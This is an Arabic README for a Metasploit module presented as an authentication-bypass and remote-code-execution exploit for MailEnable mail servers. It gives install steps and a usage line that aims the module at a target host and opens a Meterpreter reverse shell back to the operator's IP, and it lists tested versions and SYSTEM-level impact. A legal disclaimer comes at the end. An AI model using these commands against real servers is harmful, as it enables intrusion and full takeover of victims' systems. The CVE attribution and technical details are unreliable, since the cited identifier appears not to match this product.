
وحدة Metasploit لـ MailEnable CVE-2022-36934 لتجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد (RCE)
وحدة Metasploit لثغرة تجاوز المصادقة في MailEnable (CVE-2022-36934)، والتي تؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 تم الاختبار ضد:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 التفاصيل التقنية:
الثغرة: تجاوز المصادقة عبر صيغة شبيهة بـ SQLi في SMTP/POP3
ناقل الهجوم: الشبكة (المنافذ 25/110)
الامتيازات: يعمل بحساب خدمة MailEnable (غالبًا بـ SYSTEM)
⚠️ إخلاء مسؤولية قانوني:
هذه الأداة مخصصة للاختبار المصرح به فقط. لا تستخدمها أبدًا ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.